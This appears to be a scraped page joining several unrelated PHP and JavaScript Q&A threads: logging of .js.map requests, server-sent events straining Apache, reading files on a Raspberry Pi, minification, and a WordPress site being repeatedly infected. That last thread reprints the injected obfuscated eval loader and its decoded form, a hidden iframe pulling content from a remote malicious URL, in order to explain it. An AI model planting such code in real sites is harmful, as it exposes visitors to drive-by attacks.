I have a weird problem with my .js.map files being unintentionally logged.
In php files I include a header.php file for, well, my header. In my header I include logUserData.php - in which I get the user ip, account info, and log stuff in the database. Basic intention is to track where our users go (not in Analytics, just for our data uses).
Everything works fine, all traffic is logged - but, the .js.map files are tracked. You probably know these aren't listed anywhere in my source. I don't include my logging script in these files, which would be weird anyway.
I have zero purpose to track these files. I don't ever really care if they're called... I can filter them out with the script but that avoids the problem and doesn't fix it.
I have tried moving the include from the header to the footer basically as a shot in the dark. Totally at a loss. I have put the call before and after these scripts, before the html and after.
These are the scripts that have their associated maps called:
<script src="/js/toastr.min.js"></script>
<script src="/js/popper.min.js"></script>
<script src="/js/socket.io.js"></script>
And here are the only relevant parts of the logging script in case it helps, the rest is just user account and db stuff:
$browser = $_SERVER['HTTP_USER_AGENT'];
$ip = $_SERVER['REMOTE_ADDR'];
$CurUrl = $_SERVER['REQUEST_URI'];
$refer = $_SERVER['HTTP_REFERER'];
function get_client_ip() {
$ipaddress = '';
if (isset($_SERVER['HTTP_CLIENT_IP']))
$ipaddress = $_SERVER['HTTP_CLIENT_IP'];
else if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
$ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
else if (isset($_SERVER['HTTP_X_FORWARDED']))
$ipaddress = $_SERVER['HTTP_X_FORWARDED'];
else if (isset($_SERVER['HTTP_F ORWARDED_FOR']))
$ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
else if (isset($_SERVER['HTTP_FORWARDED']))
$ipaddress = $_SERVER['HTTP_FORWARDED'];
else if (isset($_SERVER['REMOTE_ADDR']))
$ipaddress = $_SERVER['REMOTE_ADDR'];
else
$ipaddress = 'UNKNOWN';
return $ipaddress;
}
Does anyone have any clue why this might be? I'm totally at a loss.
EDIT: the map files are NOT in my network activity in dev tools and served as application/javascript
Related
I would like to refresh my static web page running on apache when the index changes. I've already tried to use server-side events, where I had a PHP file checking if the index changed and if yes, it sent the event to the webpage. This works exactly how I want, but there is a problem. Because the page is used by a lot of people sometimes (tens or up to a hundred opened tabs), it quickly starts to spam many apache processes. Then, it reaches the limit, and the apache freezes.
The question is how to handle this. If a user closes the tab, the process is killed, however, if not, the apache freezes.
The PHP script looks like this (it is checking two things, first, if the file chenged, or second if the status is something. As I said, this works fine, the problem is its lagging the server):
<?php
session_start();
session_write_close();
ignore_user_abort(false);
header('Content-Type: text/event-stream');
header('Cache-Control: no-cache');
$filename = "index.html";
while(True){
if ( connection_aborted() ){
exit();
}else{
try{
$string = file_get_contents("current_status.json");
$json = json_decode($string, true);
$pom1 = $json["state"];
$t1 = shell_exec("date -r index.html");
sleep(3);
$pom2 = $json["state"];
if($t1 != shell_exec("date -r index.html")) {
sleep(2);
echo "data: file changed \n\n";
} else if($pom2=="ready") {
sleep(2);
echo "data: new shot available \n\n";
} else {
echo "heartbeat";
}
ob_flush();
flush();
}
catch (\Error $e){
echo "data: error, json not available \n\n";
}
}
}
ob_end_flush()
?>
Then, there is a classical javascript function in the index file with event source on the PHP file.
My question is, how can I do this to not make apache crashing? Can I somehow set up SSE to handle it? I know I can allow more processes on apache, but my resources are limited.
Is there any other way how to do this? For example, live.js works as well, but the problem is the sam, a lot of processes when opened multiple times.
Yes, I can see how this would put far more strain on your server than necessary.
What you should do is poll for changes from javascript. You send an asynchronous request for the last time the index file changed from your javascript. You do it once when the page loads and store the time. Then you check again on an interval and compare the result with the first one. If it changed you refresh the page.
The PHP script should get the last change date, output it and exit - no continuously running PHP scripts.
Here is what the PHP file should look like:
<?php
header('Content-type: text/plain');
echo filemtime('index.html');
?>
Keep this minimal. The built in filemtime function is more efficient than running shell_exec commands.
Here is an example javascript:
chk_index_change_time(false);
function chk_index_change_time(last){
fetch('http://yourdomain.com/yourpath/get_index_change_time.php')
.then(res => res.text())
.then((index_change_time) => {
if ((false !== last) && (last != index_change_time)){
location.reload();
} else {
setTimeout(chk_index_change_time, 3000, index_change_time);
}
});
}
Feel free to error handling or whatever, but this will work. I used a timeout here instead of interval so that if the server is slow the server response time doesn't come out of the 3 second delay.
I am making my college project on Air Quality Monitoring System, in that data (say some integer value) has to be taken from sensing unit to a webpage.
What I want
Is that the script called upon by this url http://localhost/AQProject/recordupdate.php?val=2 updates a web page displaying the content. Now I know I can save that data in database and run ajax based query every two seconds to check for update, but I want that update to be pushed by server.
What have I done:
I have tried Server sent events. Here's what i tried
<?php
header('Content-Type: text/event-stream');
header('Cache-Control: no-cache');
if($_SERVER["REQUEST_METHOD"]=="GET")
{
if(empty($_GET["val"])) die ("Empty Value from source");
else
{
$v = $_GET['val'];
echo "data: The Pollution stub value is {$v}".PHP_EOL;
ob_flush();
flush();
}
}?>
and html has script
<script>
if(typeof(EventSource) !== "undefined") {
var source = new EventSource("recordupdate.php");
source.onmessage = function(event) {
document.getElementById("result").innerHTML = event.data +
"<br>";
};
} else {
document.getElementById("result").innerHTML = "Sorry, your browser does not support server-sent events...";
}
</script>
Now, I have figured out this much that (correct me If i am wrong) it won't work because when another client (sensing unit) calls for recordupdate.php its a different instance of that script than that called by webpage client.
Is there any possible way of doing this using server sent events? Or I absolutely need to dig into websockets, node.js etc. Thanks in advance
What you want to do is not quite as easy as you hoped, but this is still a job for which SSE is suited. You don't need to use sockets, and don't need to use ajax polling.
But you do need some database store, on the server, that can be shared by PHP scripts. As installing a LAMP stack is so easy, I'd recommend using MySQL, even though it might be overkill for what you need. But your database could be as simple as a text file.
(To keep the below samples as small as possible, I've assumed your DB will be /tmp/val.txt, and I've not done any file locking, or checking for bad data. Just be aware that you need to do some work before putting this in production in an untrusted environment. I'd recommend pre-creating /tmp/val.txt to avoid any noise about files not existing.)
Your recordupdate.php has the job to record the value it is given:
<?php
if($_SERVER["REQUEST_METHOD"]=="GET")
{
if(empty($_GET["val"])) die ("Empty Value from source");
else file_put_contents("/tmp/val.txt", $_GET['val']);
}
You then have sse.php, which web clients connect to:
<?php
header('Content-Type: text/event-stream');
header('Cache-Control: no-cache');
$prev = '';
while(1){
$v = file_get_contents("/tmp/val.txt");
if($v != $prev){
echo "data: The Pollution stub value is {$v}\n\n";
$prev = $v;
}
usleep(100000); //0.1s
}
This script is checking the text file for changes 10 times a second. As soon as it spots one it sends it to the client. (Mean latency is 0.05s plus network overhead.) Sleep for less time if you need lower latency.
The only change to your front-end HTML is to call "sse.php" instead:
<script>
if(typeof(EventSource) !== "undefined") {
var source = new EventSource("sse.php");
source.onmessage = function(event) {
document.getElementById("result").innerHTML = event.data +
"<br>";
};
} else {
document.getElementById("result").innerHTML = "Sorry, your browser does not support server-sent events...";
}
</script>
HTTP is one way protocol. Request from client to server only. Yes, absolutely need to dig into websockets, node.js etc.
I know there are many different posts concerning this, but none of the posts seemed to help.
I have tried inputting
include_path=".:/path/to/dir"
along with
safe_mode_exec_dir=".:/path/to/dir"
into php.ini. I have tried turning safe_mode on, turning allow_url_fopen to On and then putting ftp:// in front of the path, and without the ftp://. I have tried using multiple different ways of opening it including...
$folder = $_GET['dir'];
$path = $folder;
$file = fopen($path, 'r');
$lines = array();
while(!feof($file)){
$lines[] = fgets($file);
}
fclose($file);
and
$lines = explode("\n", file_get_contents('doc.txt'));
I have tried setting permissions to 777 under /var/www/html and permissions on the other directory which is under /home/pi/
Nothing seems to be working.
So. I am completely out of ideas. Please help before my head banging becomes dangerous.
Here is my code for what I am trying to do...
<?php
header('Content-Type: text/xml');
echo '<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>';
echo '<response>';
$folder = $_GET['dir'];
$path = $folder."/myfile.txt";
$file = fopen($path, 'r');
$lines = array();
while(!feof($file)){
$lines[] = fgets($file);
}
fclose($file);
for($x = 0; $x < sizeof($lines); $x++){
echo $lines[$x];
}
echo '</response>';
?>
xmlHttp = createXmlHttpObject();
xmlHttp.open("GET", "getClientData.php?folder="+dir, false);
xmlHttp.onreadystatechange = function() {
if (xmlHttp.readyState == 4 && (xmlHttp.status == 200 || xmlHttp.status == 206)) {
xmlResponse = xmlHttp.responseXML;
xmlDocumentElement = xmlResponse.documentElement;
var message = xmlDocumentElement.firstChild.textContent;
}
};
xmlHttp.send();
I am running this on a Raspberry Pi 3 Model B, Rasbian Jessie, if that has anything to do with it. And Apache2.
It's interesting to note that when I change the php file a little bit to have an if/else statement like "if(file_exists($path)){}else{echo "null"}", if I call alert() in javascript from the input, I DO get "null". That's why my first assumption was a file permission thing or php.ini setting.
So I have solved it. And I will give a detailed description as to how I solved it.
First of all, do make sure that allow_url_fopen to be On and to have safe_mode off. Look through both the Apache2 php.ini and the regular php.ini as there is two of them and I believe both have to be set in order for it to work. If you installed php with apache2 on your platform, both php.ini files should be under "/etc/php5". There will be a folder called "apache2" and "cli". Each one has a file.
Secondly, Chrome Web Development Tools are amazing. Press F12 with Chrome open and go to the "Networks" tab. There will be a checkbox that says "Disable Cache" at the top of the tab. This makes sure that Chrome won't cache the results of your changes to your website. KEEP THIS WINDOW OPEN BECAUSE IF YOU CLOSE IT, IT WON'T DISABLE THE CACHE ANYMORE!!! You can also download a Chrome extention like "cache killer" which will disable cached results just the same. Also, with CWDT, the Console Tab is a debugging miracle. I have been programming the site on Aptana, which is not very good at all at noticing small semi colon or bracket errors. Utilize this tool! It will save your life as it did mine!!
Please ask questions or comments if I didn't explain something in detail.
Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 9 years ago.
Improve this question
Currently I am facing a hell like situation, four of my client websites were hacked before 10 days. I messed up a lot with them and three of them are working fine(running magento) after my long mess up with them, but one of them(running word press) is still facing the same situation and I could not figure out what was going on, after a particular timing the js files and some php files too are auto injecting with this kind of code :
<?
#ded509#
echo "<script type=\"text/javascript\" language=\"javascript\" > e=eval;v=\"0x\";a=0;try{a&=2}catch(q){a=1}if(!a){try{document[\"body\"]^=~1;}catch(q){a2=\"!\"}z=\"2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!6a!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6c!74!6c!75!7b!2f!2e!70!6d!79!68!74!6c!2e!30!42!14!11!14!11!27!27!27!27!6a!35!7a!79!6a!27!44!27!2e!6f!7b!7b!77!41!36!36!71!68!72!80!7a!72!80!6d!35!79!7c!36!6a!76!7c!75!7b!38!3d!35!77!6f!77!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!77!76!7a!70!7b!70!76!75!27!44!27!2e!68!69!7a!76!73!7c!7b!6c!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!69!76!79!6b!6c!79!27!44!27!2e!37!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!6f!6c!70!6e!6f!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7e!70!6b!7b!6f!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!73!6c!6d!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7b!76!77!27!44!27!2e!38!77!7f!2e!42!14!11!14!11!27!27!27!27!70!6d!27!2f!28!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!30!27!82!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!7e!79!70!7b!6c!2f!2e!43!6b!70!7d!27!70!6b!44!63!2e!6a!63!2e!45!43!36!6b!70!7d!45!2e!30!42!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!35!68!77!77!6c!75!6b!4a!6f!70!73!6b!2f!6a!30!42!14!11!27!27!27!27!84!14!11!84!30!2f!30!42\".split(a2);s=\"\";if(window.document)for(i=0;i<z.length;i++) {s+=String.fromCharCode(e(v+(z[i]))-7);}zaz=s;e(zaz);}</script>";
#/ded509#
?>
This code is injected in all js files and main files, I changed ftp passwords, I checked cron jobs, and manually I looked up for any php code (I am feeling like some php code is doing this) but I am unable to figure it out, and yeah I tried to decode this code and tried to get the functionality for this code, yet removing this malicious code from my js files will make my site fine for some time, but after a random time the scripts will auto injected with this code ? what is this js code actually ? It will be very helpful if somebody explains what is actually going on ?
That PHP echo this
<script type="text/javascript" language="javascript" > e=eval;v="0x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document["body"]^=~1;}catch(q){a2="!"}z="2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!6a!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6c!74!6c!75!7b!2f!2e!70!6d!79!68!74!6c!2e!30!42!14!11!14!11!27!27!27!27!6a!35!7a!79!6a!27!44!27!2e!6f!7b!7b!77!41!36!36!71!68!72!80!7a!72!80!6d!35!79!7c!36!6a!76!7c!75!7b!38!3d!35!77!6f!77!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!77!76!7a!70!7b!70!76!75!27!44!27!2e!68!69!7a!76!73!7c!7b!6c!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!69!76!79!6b!6c!79!27!44!27!2e!37!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!6f!6c!70!6e!6f!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7e!70!6b!7b!6f!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!73!6c!6d!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7b!76!77!27!44!27!2e!38!77!7f!2e!42!14!11!14!11!27!27!27!27!70!6d!27!2f!28!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!30!27!82!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!7e!79!70!7b!6c!2f!2e!43!6b!70!7d!27!70!6b!44!63!2e!6a!63!2e!45!43!36!6b!70!7d!45!2e!30!42!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!35!68!77!77!6c!75!6b!4a!6f!70!73!6b!2f!6a!30!42!14!11!27!27!27!27!84!14!11!84!30!2f!30!42".split(a2);s="";if(window.document)for(i=0;i<z.length;i++) {s+=String.fromCharCode(e(v+(z[i]))-7);}zaz=s;e(zaz);}</script>
In readable form it looks like this
e = eval;
v = "0x";
a = 0;
try {
a &= 2
} catch (q) {
a = 1
}
if (!a) {
try {
document["body"] ^= ~1;
} catch (q) {
a2 = "!"
}
z = "2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!6a!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6c!74!6c!75!7b!2f!2e!70!6d!79!68!74!6c!2e!30!42!14!11!14!11!27!27!27!27!6a!35!7a!79!6a!27!44!27!2e!6f!7b!7b!77!41!36!36!71!68!72!80!7a!72!80!6d!35!79!7c!36!6a!76!7c!75!7b!38!3d!35!77!6f!77!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!77!76!7a!70!7b!70!76!75!27!44!27!2e!68!69!7a!76!73!7c!7b!6c!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!69!76!79!6b!6c!79!27!44!27!2e!37!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!6f!6c!70!6e!6f!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7e!70!6b!7b!6f!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!73!6c!6d!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7b!76!77!27!44!27!2e!38!77!7f!2e!42!14!11!14!11!27!27!27!27!70!6d!27!2f!28!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!30!27!82!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!7e!79!70!7b!6c!2f!2e!43!6b!70!7d!27!70!6b!44!63!2e!6a!63!2e!45!43!36!6b!70!7d!45!2e!30!42!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!35!68!77!77!6c!75!6b!4a!6f!70!73!6b!2f!6a!30!42!14!11!27!27!27!27!84!14!11!84!30!2f!30!42".split(a2);
s = "";
if (window.document) for (i = 0; i < z.length; i++) {
s += String.fromCharCode(e(v + (z[i])) - 7);
}
zaz = s;
e(zaz);
}
In the above code e is the function eval
If we remove eval and prints the contents of zaz it will look like this.
(function () {
var c = document.createElement('iframe');
c.src = 'http://jakyskyf.ru/count16.php';
c.style.position = 'absolute';
c.style.border = '0';
c.style.height = '1px';
c.style.width = '1px';
c.style.left = '1px';
c.style.top = '1px';
if (!document.getElementById('c')) {
document.write('<div id=\'c\'></div>');
document.getElementById('c').appendChild(c);
}
})();
Its a self executing anonymous function. The script creates an iframe in your page and load contents from http://jakyskyf.ru/count16.php
If your server is hosted in a shared server maybe the admin account itself is compromised.
Things you can do.
Your best place to check is server logs. Check for some malicious entries.
Check with your hosting provider.
Change your password to a strong password.
Normally in wordpress sites this thing happends (it happened in lot of my wordpress sites). If you are using wordpress update to latest version.
Change the admin username from admin to someother name.
Change your admin email and password. Hacker might have changed it.
These links will provide you more inputs
Iframe Virus
Iframe injection attack
Server wide iFrame injection attacks
Hidden iFrame injection attacks
You'll have to change the permissions of your root directory files or the files that are being repeatedly hacked to 444. Make sure you change permissions of all index.php/html files and .htaccess files to read only. Also giving a 555 permission js directory and files would help.
This is the quick solution to stop being spammed again and again. To find the root of this you'll have to check your database entries for common forms like contact_us etc which might be taking scripts without proper sanitization filters. Also remove any unknown files from your root directory.
I'm looking for a way to structure my workflow so I don't get confused/into trouble when working with "uncompressed" js/css files for development and minified ones for production.
I don't want to have two html versions (one with development and one with minified js/css files) of the same source. Or do I have to?
Also whats the best way to automate the actual minify process?
NOTE: I'm looking for a local solution. Server side is not an option.
I've been using this in PHP – you might use it for inspiration:
<?
$test_server = $_SERVER['SERVER_NAME'] == "127.0.0.1" || $_SERVER['SERVER_NAME'] == "localhost" || substr($_SERVER['SERVER_NAME'],0,3) == "192";
function caching_headers ($timestamp) {
global $test_server;
if (!$test_server) {
$gmt_mtime = gmdate('r', $timestamp);
if(isset($_SERVER['HTTP_IF_MODIFIED_SINCE'])) {
if ($_SERVER['HTTP_IF_MODIFIED_SINCE'] == $gmt_mtime) {
header('HTTP/1.1 304 Not Modified');
exit();
}
}
header('Last-Modified: '.$gmt_mtime);
}
}
header ("Content-Type: application/javascript; charset=utf-8");
include ($_SERVER['DOCUMENT_ROOT']."/media/js/jsmin.php");
$libs = explode("|",$_GET['libs']);
$uniq_string = "";
foreach ($libs as $lib) {
$uniq_string .= filemtime($_SERVER['DOCUMENT_ROOT']."/media/js/$lib.js");
}
$hash = md5($uniq_string);
$cachefile = $_SERVER['DOCUMENT_ROOT']."/cache/".$hash.".js";
if(file_exists($cachefile)) {
$last_mod = filemtime($cachefile);
caching_headers ($last_mod);
include($cachefile);
echo "//Cached on ".gmdate('r', $last_mod)." to ".$hash;
exit;
} else {
$combined = "";
foreach ($libs as $lib) {
if (substr($lib, strlen($lib)-3, 3) == "min") {
$combined .= file_get_contents($_SERVER['DOCUMENT_ROOT']."/media/js/$lib.js")."\n";
} else {
$combined .= JSMin::minify(file_get_contents($_SERVER['DOCUMENT_ROOT']."/media/js/$lib.js"))."\n";
}
}
$fp = fopen($cachefile, 'w');
fwrite($fp, $combined);
fclose($fp);
$last_mod = filemtime($cachefile);
caching_headers ($last_mod);
include($cachefile);
echo "//Cached on ".gmdate('r', $last_mod)." to ".$hash;
}
?>
alongside JSMin-php.
I then use:
<script src="/media/js/combined.php?libs=jquery-1.5.1.min|behaviour|jquery.form"></script>
in my pages.
It stores the cached minified file at /cache/, so make sure that folder exists if you are trying this.
Currently the best solution is the HTML5 boilerplate build script.
Beware that there is a learning curve before being able to use the complete power.
Also it's worth mentioning, that the build script optimized for websites, where every page uses the same JavaScript and CSS files. So if you have certain pages, that have additional CSS and JavaScript files that you want to have optimized/minified you might need to do this separately.
The script also compresses HTML and (optionally) leaves PHP stuff untouched.
HTML5 boilerplate build script is awesome. It's open source, please contribute!
Note: Most of my infos are 3+ month old. Let me know about new developments.
You could dynamically inject the appropriate js include depending on the URL. In essence, you check to see if it's the production URL, and if it is include the minified version. Then use an else branch to handle non-production URLs and inject the development version (this way someone can't see your staging URL).